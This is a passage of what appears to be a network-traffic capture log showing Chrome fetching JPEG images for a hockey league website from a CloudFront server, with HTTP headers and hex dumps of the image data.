                                                                                                                          2025-01-13 21:01:19 UTC5296INData Raw: fc 33 40 44 d2 b9 51 96 64 52 57 a9 ea 4d 66 a2 a8 ae 98 aa 3d 5e 5d eb 13 a6 bb 55 9a bb d3 33 1f c3 c0 34 bf 05 7b fe fb 57 9f 4d 9b 51 b7 b7 6b 6d be 35 a9 65 44 32 29 99 f9 b9 2d f2 32 0b 10 ac 73 9a bf 69 5e 03 f7 76 a5 b5 6c b7 6a ee 5b 58 ac 27 d2 1a fd dd e1 3c d1 4e b2 72 7e 1c 8f 73 d4 e6 b3 8d b1 b1 78 c5 ae 6d f4 8b 85 fc 71 96 4d 2b 4c b5 95 ec 3f 15 6a 2d a6 b8 b9 b5 90 21 b7 60 72 48 fd 6b 63 27 06 af b7 3b 6f 8d 56 d6 51 6c ed 53 8d d7 16 da d6 ab 34 8b 69 a5 b6 9e 3c 97 96 28 d2 57 0e df b0 73 21 1e dd 2a cc 6f 2a d7 fc 0f eb 3a 71 4b 4d 23 7b d8 5e de 2d bb cd f8 69 23 11 c9 cc 06 47 40 c7 e5 39 ee 71 f6 a8 1a 67 83 f9 b7 56 ae fa 2e d4 e2 1d 95 cb d9 5c cd 61 aa c9 71 01 85 2d ae d2 13 20 40 dd 79 94 e3 19 e9 59 37 f8 9c e3 13 de f1 03
                                                                                                                          Data Ascii: 3@DQdRWMf=^]U34{WMQkm5eD2)-2si^vlj[X'<Nr~sxmqM+L?j-!`rHkc';oVQlS4i<(Ws!*o*:qKM#{^-i#G@9qgV.\aq- @yY7


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          98192.168.11.204991954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC675OUTGET /app/uploads/gthl/2024/12/10213839/Screenshot-2024-12-10-at-9.32.59-PM-730x410.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 93722
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Wed, 11 Dec 2024 02:38:41 GMT
                                                                                                                          ETag: "3c6dc49970f3cc5916494cd761497389"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 67711c5cba0352ee130f60f6cc103e0a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: cj1n1Nkt3pe7PxCHFQfEEUvWteDduLqu_MHXUK45BqUqZINL4Fg19g==
                                                                                                                          2025-01-13 21:01:19 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 39 00 39 00 00 ff e2 0f d0 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0f c0 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 01 00 01 00 0b 00 0c 00 2d 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 04 9c 63 70 72 74 00 00 06 50 00 00 00 23 77 74 70 74 00 00 06 74 00 00 00 14 72 58 59 5a 00 00 06 88 00 00 00 14 67 58 59 5a 00 00 06 9c 00 00 00 14 62 58 59 5a 00 00 06 b0 00 00 00 14 72
                                                                                                                          Data Ascii: JFIF99ICC_PROFILEapplmntrRGB XYZ -acspAPPLAPPL-appldescPbdscmcprtP#wtpttrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:19 UTC8819INData Raw: b6 19 25 40 59 95 e3 46 d6 dd 75 10 2f fd d1 ed 6b 61 f1 8e ae be 9e 76 96 49 65 a7 47 1a 88 0a 75 0f 6b 8d f6 c0 37 f9 b9 60 a5 0e 8d ea 7b 12 fb 48 14 5c dc df f4 e9 f5 c3 78 26 7d 22 b2 a6 94 0b 39 11 8f cc 5f 57 42 3d 97 7e 98 49 f2 4c 2b 48 8e 34 b1 da cb 60 9d b7 03 6b 7b 62 bf ee f5 b3 06 95 98 c7 49 15 a3 64 b9 57 3d 2f 73 dc 5b 00 ee 0a 69 29 84 34 cf 53 23 48 49 6d 66 e4 6a eb 7b f6 1b 10 30 d5 3c ff 00 3e 6a a5 95 9d 65 70 2c dd 3f 50 3f c4 61 53 e6 92 45 12 51 d2 4f 14 86 38 c9 76 0c 18 a2 ff 00 c4 76 c0 e3 a6 59 88 34 f2 48 ae 1c 06 78 6e 75 fb 5a fb 6f df 01 2d 48 93 c8 82 06 98 09 2e 54 09 07 a9 c7 7b 5b b7 6c 52 96 48 b2 f7 92 9a a0 46 49 7f 42 83 76 56 fb f4 b6 18 51 41 9b fc db 4f 29 66 9d 24 b7 95 a0 8b 2f 4d be bb 62 55 e8 6b aa 6a 01
                                                                                                                          Data Ascii: %@YFu/kavIeGuk7`{H\x&}"9_WB=~IL+H4`k{bIdW=/s[i)4S#HImfj{0<>jep,?P?aSEQO8vvY4HxnuZo-H.T{[lRHFIBvVQAO)f$/MbUkj
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: db 74 e9 b4 c4 6f 09 28 92 3b d9 e3 36 b5 89 bf 5f b6 07 3a 85 d6 ab 1a 81 d5 58 ee 71 1b 47 98 34 52 ac 1a 75 42 76 1a 85 ec 71 27 10 82 62 c7 51 60 07 51 bd 86 13 bc 2f a5 eb 92 36 84 64 f4 e8 ea d2 c4 15 c8 ea 09 b7 eb 6c 36 82 96 42 f6 32 36 ab 1b af 62 3b 62 4a ae 9e 18 24 67 69 2c 2e 05 af 6b f7 c2 24 71 14 76 21 d0 9b 81 d3 7c 64 ae 49 46 be 18 df 79 47 cd 14 a5 83 2a ea 0b fc 5f e5 84 19 e4 31 68 55 66 01 ae 76 c3 99 65 61 18 ba 96 b1 b2 9b 03 b6 00 55 63 9a d7 b1 3b 9b 77 c6 4e f9 47 bd 62 27 83 39 a8 a9 ab 2c 23 8c 43 36 e0 93 dc e1 af 93 25 23 94 ad 4e 9b 11 d7 6c 4f aa a4 6e 5e 5d 27 60 ca c1 6f b7 b6 1e d6 e5 b4 19 a5 19 91 c1 07 a9 73 fb a0 61 f5 7e 56 7e 0b be 37 ac f3 0b 4e 49 c4 ac 44 68 13 6b 0b 1b 02 30 96 96 4a 74 3a 77 d2 37 03 df 06
                                                                                                                          Data Ascii: to(;6_:XqG4RuBvq'bQ`Q/6dl6B26b;bJ$gi,.k$qv!|dIFyG*_1hUfveaUc;wNGb'9,#C6%#NlOn^]'`osa~V~7NIDhk0Jt:w7
                                                                                                                          2025-01-13 21:01:19 UTC1024INData Raw: aa 97 c2 86 56 f0 90 bf fa 5e bd 98 69 be e2 73 7f e6 36 c6 e0 4e d0 23 ab bc 6d a9 6c 08 6d c0 27 d8 7b 7f 86 02 3a 96 82 ae 25 35 1e 71 d4 82 ea 0a ea 28 7d ef f5 c3 6a 99 2a 32 ea 79 95 27 79 ea 65 d4 5c 30 b8 52 7f 7a dd 6d ed 6c 3e 75 a9 85 ad d5 dc 69 d0 3a 31 20 9b 83 88 98 72 d9 d1 9a 5a a8 a4 58 d8 94 44 53 72 47 7b b1 c0 7b cc 4d 32 19 9a 44 92 5b 27 9a c3 d3 b7 50 3d af 81 54 ad 0c c0 4a 60 6d 30 92 ad 1e 8b 06 40 41 1d f6 22 db 5e f8 5d 7c 4b 96 d2 c8 4d 54 ac c5 47 a3 56 e4 9d 95 76 de e3 b6 20 28 56 b6 a2 9e 79 aa 69 d2 68 67 61 12 b2 6c 97 1b 36 a1 d0 9c 04 94 92 d6 14 76 a9 a3 8e 68 55 3d 1e 67 51 ec 01 e9 d3 0d 1c 49 a6 59 2a 22 6a 78 e2 2a 22 b2 82 c8 0e f7 23 a6 db d8 7d 70 88 f3 39 c4 89 e6 c7 21 82 20 62 f2 8a 96 11 f6 05 bf f1 b6 24
                                                                                                                          Data Ascii: V^is6N#mlm'{:%5q(}j*2y'ye\0Rzml>ui:1 rZXDSrG{{M2D['P=TJ`m0@A"^]|KMTGVv (Vyihgal6vhU=gQIY*"jx*"#}p9! b$
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: be d8 76 25 79 a5 f9 69 63 5b 8b c8 35 0d 80 ff 00 96 1f 2c 37 87 c9 92 cd 19 bd f7 b0 c0 45 18 a3 86 f1 44 91 a8 3e b2 bb 82 6e 77 b7 d7 05 f2 0c 9a 84 45 f4 b2 8d 56 6d c1 ed 6f 6c 2d e1 76 62 90 c6 0c 65 40 62 0f aa e3 eb 8a 40 c9 24 61 5d da 13 ab 48 0b b9 6b 7b e0 1c 41 99 2a 05 a7 90 97 03 d2 49 da e7 14 e2 0e 1e c8 78 bf 26 9f 23 cf b2 9a 5c ca 82 a9 0a 4b 4f 53 18 74 60 7a 82 0e 19 4d a8 48 b4 e2 95 54 92 51 5d fb 77 36 fb fb e1 fd 21 78 e3 5d 20 aa a6 f6 27 be 1f a4 91 f9 67 ba bc 4f cb 43 b9 f9 f0 df 6a 29 2a 78 b7 90 b5 06 2b ea 96 5e 1f a9 93 f0 cb 75 fc 07 3f 97 e8 ad 7f be 34 fe a3 97 9c eb a3 a8 96 92 a7 96 5c 42 26 81 da 39 07 ec b9 0d 98 1b 1d c0 df 71 8e dd a5 64 75 41 a3 65 29 a4 da ed d0 e1 5f 27 09 df cb 5c 42 cb d3 f0 66 9e e9 e1 d7
                                                                                                                          Data Ascii: v%yic[5,7ED>nwEVmol-vbe@b@$a]Hk{A*Ix&#\KOSt`zMHTQ]w6!x] 'gOCj)*x+^u?4\B&9qduAe)_'\Bf
                                                                                                                          2025-01-13 21:01:19 UTC1024INData Raw: 52 6e c1 89 3d 3d 81 e9 81 3d 3d 48 28 05 fc b8 fa a2 8b ff 00 2c 2d e4 75 01 e5 a7 76 23 f2 d9 ac 4f e9 80 6f 24 71 d3 aa fe 33 22 93 a8 8b 1b b0 ff 00 4f ae 24 1e 53 a6 e2 cb 1b 2d c5 ac 6e 30 38 c5 3d 44 ca b2 2c 85 94 5c a9 1d 07 df 08 92 78 8c 86 04 99 7c ab 69 6b 10 0d fb 6f 80 61 26 65 1a 23 51 52 8d 4c ca 7f 11 da ca 0f df 14 58 e1 65 0c d5 d7 24 5c 91 7b 1c 26 b7 2c 8e 5b 1a 39 42 b2 36 a5 6b 8b 03 fd ef 7c 0a d0 0d 8d 2c f7 fa 32 db 01 68 45 07 ca 35 54 89 74 80 d9 0f 9e 48 05 4d f6 1b 5c 01 fc 5d 30 78 1d de 90 55 53 d4 23 30 0c 83 54 be 64 6b b7 40 7b 5f ef 80 4a d0 eb 5a e9 e7 66 8e 68 54 a6 bb 75 20 8d 3d 37 50 6d b7 6c 56 87 2e 8d 12 2f 95 4a bf 95 08 64 a8 01 7d 16 e8 42 fb b7 db a6 01 ac a6 a9 eb 21 11 c4 f0 43 50 6d 12 1b 0f 32 c3 7b 01
                                                                                                                          Data Ascii: Rn====H(,-uv#Oo$q3"O$S-n08=D,\x|ikoa&e#QRLXe$\{&,[9B6k|,2hE5TtHM\]0xUS#0Tdk@{_JZfhTu =7PmlV./Jd}B!CPm2{
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 49 a2 32 48 96 36 74 7e 9b 0d c6 02 c6 f0 af 48 dc c5 f1 a9 c2 75 48 a2 54 ac e2 99 73 52 0e e0 a2 c8 f2 9b fd 2c 31 dc 7c ce 0a 73 50 a2 42 a1 83 08 83 0f 50 5e fb 0e f6 e9 8e 3a fc 2e 38 52 be b3 c5 35 06 77 2d 04 a8 b9 26 57 59 56 af 2c 64 28 66 51 18 dc ec 2f e6 1c 76 66 76 2b 51 0c d2 79 48 59 84 8a 08 b1 6b f5 52 6d d7 db 01 c5 af 8a 2c 15 03 c5 5e 63 24 a8 57 cd ca a8 64 42 45 b5 2f 96 77 1f d4 63 a4 7e 00 aa e9 6a fc 18 f0 02 51 b2 bc b4 b4 52 c7 27 96 f7 21 c5 44 84 86 03 a7 51 f5 df 18 73 e2 3b e0 d3 8a 79 e0 99 7f 35 79 63 48 b9 87 13 e4 f0 fc 96 65 95 a3 01 2d 4d 35 cb 23 a5 ec 35 2d cf a7 d8 e3 9e fc 2f cd 2f 15 de 1b 52 7e 1b e1 dc d3 8b b8 4a 33 29 67 a3 9a 8d c2 09 3b b2 a4 8a 40 6f a8 c0 75 8f e2 29 59 0e 5f e1 3b 8e 0d 7d 52 af cd d2 c1
                                                                                                                          Data Ascii: I2H6t~HuHTsR,1|sPBP^:.8R5w-&WYV,d(fQ/vfv+QyHYkRm,^c$WdBE/wc~jQR'!DQs;y5ycHe-M5#5-//R~J3)g;@ou)Y_;}R
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 37 36 3f fd 1e 2f 8d d1 f8 61 f1 98 e2 af 08 1c 2b 04 e5 64 9b 22 96 ab 2b 70 be a2 02 4a 4a 0b 7b e8 65 c6 99 55 15 5f 8c 9b ba 46 42 ff 00 b4 9a ac 47 ff 00 d3 b0 1d 00 f1 a2 b4 ed e1 5f 9a 9e 4a 3b 24 1c 33 55 bf b9 d3 b1 fa f5 c6 aa fc 24 2d ff 00 56 2e 67 6a d7 ff 00 d2 f5 26 ca 2f ff 00 b0 2e 36 9f c6 24 4f 0f 84 be 6a aa 16 d2 dc 35 56 5a dd 2e 57 6e bb e3 54 be 12 73 11 e1 b7 99 50 aa c8 5d b3 6a 92 a0 0f 49 26 85 00 fd 70 16 1f c1 81 d9 79 a5 cd 1b 38 03 f6 65 2e a0 7a 11 f3 0f db 0d 7e 2e ec f2 78 98 e5 73 35 f4 1c a2 10 80 8b 6d f3 cd 87 1f 06 a7 96 8f 9b 9c ce a5 93 44 53 3e 59 00 f2 e4 60 ad b5 43 ea b0 3b dc 60 1f 17 00 2a bc 4e f2 ba 8e 89 9a 7a 85 ca 29 d5 a2 53 aa 40 c6 b9 88 04 0d ee 70 17 f7 c6 52 1f 27 97 1c aa 24 96 66 cd eb 09 62 7f
                                                                                                                          Data Ascii: 76?/a+d"+pJJ{eU_FBG_J;$3U$-V.gj&/.6$Oj5VZ.WnTsP]jI&py8e.z~.xs5mDS>Y`C;`*Nz)S@pR'$fb
                                                                                                                          2025-01-13 21:01:19 UTC2048INData Raw: 1c 2f 51 9e f0 0e 7a dc 34 d2 64 3e 63 47 4d 94 54 d2 3d 4c d2 d3 23 fa b5 69 42 5a 36 b9 d8 db ae 06 eb b9 fc 51 73 a7 20 c8 38 73 8c 78 94 f0 55 7e 59 c7 b9 26 69 9a e4 f4 79 72 ca 27 cb 64 a6 a5 6a 88 c4 ac 58 89 90 aa e9 62 a1 6c c7 6c 40 f0 8f 8c ce 73 d6 65 b5 d5 79 ae 53 91 55 25 2c d9 0c 72 ce d9 6c f9 7b d3 cb 5f 50 88 d0 98 25 72 ce be 5b 16 59 45 97 6e f8 b3 a7 e3 7e 04 c9 e8 f3 3e 2f e5 b7 24 78 42 4c ab 37 ac ce b2 da bc e4 25 5d 6d 2a 50 c6 54 28 f2 62 25 a9 d2 60 e4 bc a8 a1 16 db 8c 3d e6 4f 3c 39 47 fb 23 8b d7 88 39 27 97 e6 f5 b9 66 4b 90 d0 e5 6f 49 4d 55 51 43 3d 14 c2 29 51 26 ab 8c 69 45 8d 9a f1 b1 20 d8 0f 7c 06 c1 f3 bb 9b dc dd c9 39 a5 97 f2 ff 00 96 15 3c 23 49 18 e1 4a de 26 ab a9 ce e2 92 40 e2 9e 45 5f 28 14 75 d1 a8 31 f5
                                                                                                                          Data Ascii: /Qz4d>cGMT=L#iBZ6Qs 8sxU~Y&iyr'djXbll@seySU%,rl{_P%r[YEn~>/$xBL7%]m*PT(b%`=O<9G#9'fKoIMUQC=)Q&iE |9<#IJ&@E_(u1
                                                                                                                          2025-01-13 21:01:19 UTC7079INData Raw: 2f e0 8c ae 3a dc c1 2a 12 a6 61 00 7d 62 79 3c c9 76 6b 81 a9 f7 36 18 0b 5f 93 5c e3 a8 e6 77 1a f1 d6 5a 23 a3 fd 8f 91 4b 95 49 94 cb 02 91 24 90 d5 d1 ac e4 b9 b9 04 82 c0 0c 66 38 aa b4 4b a6 54 2c 8f d1 86 e4 7d fd b1 8a b2 df 0d 7c 8c e1 dc ff 00 2f e2 4c 97 81 a9 a8 73 3c b0 c2 b4 b3 d3 cf 32 69 f2 96 d1 86 50 f6 6d 20 69 1a af b5 b1 92 1a 16 04 32 b9 1a bd fa 91 80 98 7d e3 2c a0 6e 3d 20 77 c3 74 54 59 74 a1 2a 07 41 ef 86 70 56 d4 c0 c1 59 43 c4 37 0c 3b 0c 4a 2b 2c ba 66 88 ae 9e f8 01 32 28 91 99 4b 06 02 e0 83 d3 15 05 95 8e 95 37 60 3a e0 a6 39 09 b7 a7 7c 50 5c 28 07 f7 76 b0 c0 16 21 65 d3 b9 23 ae 16 0b 74 18 41 0e 00 b1 b6 2a 9a 86 e5 ce 00 f8 f6 12 09 ef 6c 2b 01 ec 7b 1e c7 b0 1e c7 b1 ec 53 01 5c 7b 08 32 2d 8d ba e0 46 67 5e 82 f8
                                                                                                                          Data Ascii: /:*a}by<vk6_\wZ#KI$f8KT,}|/Ls<2iPm i2},n= wtTYt*ApVYC7;J+,f2(K7`:9|P\(v!e#tA*l+{S\{2-Fg^


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          99192.168.11.204992054.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC443OUTGET /app/uploads/gthl/2024/12/20145510/U10-A-Applewood-Coyotes-GTHL-Community-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 122864
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Fri, 20 Dec 2024 19:55:11 GMT
                                                                                                                          ETag: "9c4b1656fd7092d4480b8fa028b98bf8"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 ead5a4c5fbab9ab09302c9bd4c52b4b4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 4pE78XgIUj-lT83Guj4LEgnd0H5qpmn_IgMEJ3baTiLHyHx3J_tAWw==
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 04 03 01 01 01 00 00 00 00 00 00 00 00 00 07 04 05 06 08 02 03 09 01 00 0a ff c4 00 60 10 00 01 03 03 03 02 04 04 03 05 04 05 07 07 01 19 01 02 03 04 05 06 11 00 12 21 07 31 08 13 41 51 14 22 61 71 32 81 91 15 23
                                                                                                                          Data Ascii: JFIF&&CC"`!1AQ"aq2#
                                                                                                                          2025-01-13 21:01:19 UTC6990INData Raw: ea 96 47 af 74 e3 d0 24 6b ca e7 53 26 74 ca d4 93 3a 1e ff 00 89 5b 5f 07 1c 36 78 6c ac 10 55 f9 0c 9f b8 d5 77 99 55 61 12 db 6e 5b eb 0b 94 37 b4 e3 a7 21 cf f8 bd fe 87 46 f4 8c 02 1c 72 7b 70 a8 ba df 53 f1 63 18 fd ce e5 15 a6 f5 2a 24 f5 04 3b 72 dc 69 40 69 2d 64 16 db 56 37 20 9e 5b 03 3c 36 80 54 79 3b 06 75 eb 7d 48 68 37 20 0b c6 b8 d9 9a 12 24 8f 25 0a 0e e2 41 91 ca 76 e3 3e 66 15 f9 9e fd b4 2d dd e9 ea 3b e7 59 79 87 d0 0d 5f d2 cc 2e ba f4 1f c7 67 86 4b 3b a3 96 8d b3 75 75 39 c4 55 e9 f4 c6 d9 9a 1c a6 c9 52 bc ee 4a b2 52 d9 19 c9 f4 e3 53 cf fe 68 97 84 5f fe 8a 63 ff 00 ad 72 ff 00 f7 7a e2 76 73 c9 1a c7 77 d0 0d 37 40 4b 6b b2 f5 bf 1b 5e 06 ae 3a b5 3e b9 5b bd e3 4b 9d 4b 56 e8 ae ae 95 33 29 e7 20 10 1b c2 c0 38 50 0a c8 0a 00
                                                                                                                          Data Ascii: Gt$kS&t:[_6xlUwUan[7!Fr{pSc*$;ri@i-dV7 [<6Ty;u}Hh7 $%Av>f-;Yy_.gK;uu9URJRSh_crzvsw7@Kk^:>[KKV3) 8P
                                                                                                                          2025-01-13 21:01:19 UTC11012INData Raw: fa ea 19 d4 38 e9 a7 b2 b6 98 cf c3 fc 68 90 cf d3 78 f9 93 f9 28 69 f6 34 b5 f9 f1 e5 6e c0 2c 36 a3 f7 03 56 21 ba 5a d7 b5 61 32 f2 04 ce 97 12 5e 2a 8f d4 51 56 ff 00 c1 0c 6a 81 9d 4a 66 52 61 26 32 69 2f a4 2d 18 f3 d4 b4 f9 1b 82 f1 ce d1 91 8c fb 9d 73 e7 ad 31 53 4b eb 55 f9 0d 09 00 35 71 54 10 07 d3 cf 59 d7 41 7c 12 bc d4 cb 82 9d 53 8f 4a 08 6e 44 39 a8 f8 e0 e7 fa dc 06 8f 95 b7 3c 6d e4 e7 1f c5 f4 d5 0c f1 40 23 53 3c 45 f5 11 a9 0e 21 b4 ff 00 a4 53 08 07 d7 2e 13 d8 7d f5 bc 81 da 8e af 30 be 4c ca 8f c1 91 d1 8e c4 8f b2 9d 74 06 fc 14 ba d2 2d 27 22 c7 f2 eb 08 5a 54 e2 fb ad cd 80 a1 07 e9 8d df f5 b4 75 9b d3 de 9b db d9 0f 47 95 0e 45 49 29 76 42 d6 95 ad 29 5e df e0 29 21 49 cf b6 48 f5 d5 46 e9 0d 6e 9c 7a a9 6a a2 40 0e a5 da 93
                                                                                                                          Data Ascii: 8hx(i4n,6V!Za2^*QVjJfRa&2i/-s1SKU5qTYA|SJnD9<m@#S<E!S.}0Lt-'"ZTuGEI)vB)^)!IHFnzj@
                                                                                                                          2025-01-13 21:01:19 UTC6396INData Raw: 02 a0 09 d5 db 1c 2e d5 63 b8 a4 7a e8 9f 4a 69 57 35 5f f6 fd c5 b5 c8 ee 2b 31 21 28 fc ae fb ad cf 64 03 9e 3d 71 ab 4a bb b5 c9 74 da 8d a9 02 a3 1a 93 4f 66 11 84 db d1 9a 18 4a 7d 42 00 e3 71 fc fe 83 d7 55 52 89 76 cb a7 46 66 14 45 a9 96 54 76 bc e8 38 fd da 46 02 53 fa 68 97 4a b9 2a 13 4d 3a 63 2c 06 a9 d1 54 4a 51 dc b8 b5 0f 99 47 df d0 7d 86 b1 19 d3 3f 2a 62 f7 9f 87 b0 f2 5a bc 4c 76 c3 18 63 46 eb 55 4f a2 56 f3 4d 46 9d 09 33 5b 7e 7c 92 d2 93 e6 1c e3 66 4e 40 f5 ce 35 35 b6 3a 17 6b 2e 2c 1a 44 b9 61 f9 1b 9c 12 e4 47 51 57 96 d1 c1 6d 2e 91 c1 39 c9 1e c4 1e d9 1a 8a ca ad d4 ea ae ca a7 cc 71 c8 c1 c7 1c 75 2e c7 1c 8d de d9 f4 ff 00 c4 7a e9 c6 8f d4 99 56 cc 04 d3 55 4e 4c 39 00 29 b4 ce 65 3b 9b 5a 0f 05 2e 27 be 3e b9 24 7a 1d 0c
                                                                                                                          Data Ascii: .czJiW5_+1!(d=qJtOfJ}BqURvFfETv8FShJ*M:c,TJQG}?*bZLvcFUOVMF3[~|fN@55:k.,DaGQWm.9qu.zVUNL9)e;Z.'>$z
                                                                                                                          2025-01-13 21:01:19 UTC9988INData Raw: d5 eb f8 47 ae 27 7d 78 f0 20 23 d5 66 cc e9 75 48 d3 26 29 c5 ad 76 bd 59 40 21 44 92 4f c1 be 7e 57 1b 27 f0 a5 58 23 81 bb 55 12 8c 4c 69 43 5e 6a f8 be 3e 57 e6 b4 63 af 66 65 c2 18 76 0d e7 49 a2 6f bd 7f bf 24 38 e8 1f 87 c8 b1 2c c9 3d 5f b9 eb 25 da 84 d8 ee 26 95 01 b9 5e 61 8e d9 e0 ad ec 1f c4 40 38 49 ed dc e9 63 15 89 54 57 d4 fc 37 c6 4f f0 2f 96 d7 f7 1e 9f 96 ab d5 cb 69 f5 1b a5 b5 45 43 ab 52 2e 1b 56 71 38 d8 a4 b8 c8 5f d4 03 c2 87 d5 2a 23 59 d0 2e 5e a3 d6 6a 91 2d d6 ab 30 e4 49 9c e8 65 96 e4 60 95 28 f6 c9 1f 87 f3 d0 d2 f4 dc 89 e5 2f 2e b0 78 f4 08 66 e7 41 13 00 6e df 5b dd 58 97 fa ff 00 5f b6 a2 3d f0 9f 0f 4f 0b 41 42 97 e6 0d a3 eb 8c 64 9f cf 41 3b ca ef 99 d4 59 50 a9 10 da 72 41 54 8f 29 b7 56 32 b7 de 75 63 72 bf 32 00
                                                                                                                          Data Ascii: G'}x #fuH&)vY@!DO~W'X#ULiC^j>WcfevIo$8,=_%&^a@8IcTW7O/iECR.Vq8_*#Y.^j-0Ie`(/.xfAn[X_=OABdA;YPrAT)V2ucr2
                                                                                                                          2025-01-13 21:01:19 UTC2754INData Raw: 7f de 54 22 e5 af a2 c9 ab 2a e1 6d d4 a9 e9 74 b5 38 94 81 94 29 fc a5 3b 80 fb 9d 0b a4 75 ae 7d 6a a9 3b a6 5d 52 6a 23 d3 9c 4f c5 52 6a ad b6 10 e0 51 19 09 38 ee 92 9e 3e da 2a 55 69 d0 2e 1a 3c ea 14 f0 14 b8 2e 3a 1a 71 0d 85 38 d7 cc 36 91 eb 8c e3 23 d7 1a a9 5d 6c a1 54 db ea 85 8c 80 f2 0c b2 e2 e3 29 6c af 21 68 0a 05 1d bf de 50 fb 6a c2 b7 43 13 b2 b1 34 55 1a 4d 12 3c 00 72 e3 8c 85 f1 ea a5 a8 91 fc b1 a9 05 34 30 e0 f2 9e 6b 7b dd 95 ce 36 9c 6a 1b 43 96 64 ba 21 b2 85 3a eb 5b 5a 64 e3 80 94 80 91 9f d3 45 6b 6a d7 7b 7c 77 65 72 a7 14 3c e5 63 84 8e f9 3a 72 e1 b2 96 bb 2d 34 1b 45 29 7d a4 a4 f9 41 49 52 bb f6 ef ae 3f 7f 68 1d e4 f5 c9 7f 43 69 2f ef 8e c8 4e c1 9e 39 59 e7 fe ce ac df f6 80 f5 ef ac 56 55 c6 8b 76 9d 5e 6a 8d 6c cb
                                                                                                                          Data Ascii: T"*mt8);u}j;]Rj#ORjQ8>*Ui.<.:q86#]lT)l!hPjC4UM<r40k{6jCd!:[ZdEkj{|wer<c:r-4E)}AIR?hCi/N9YVUv^jl
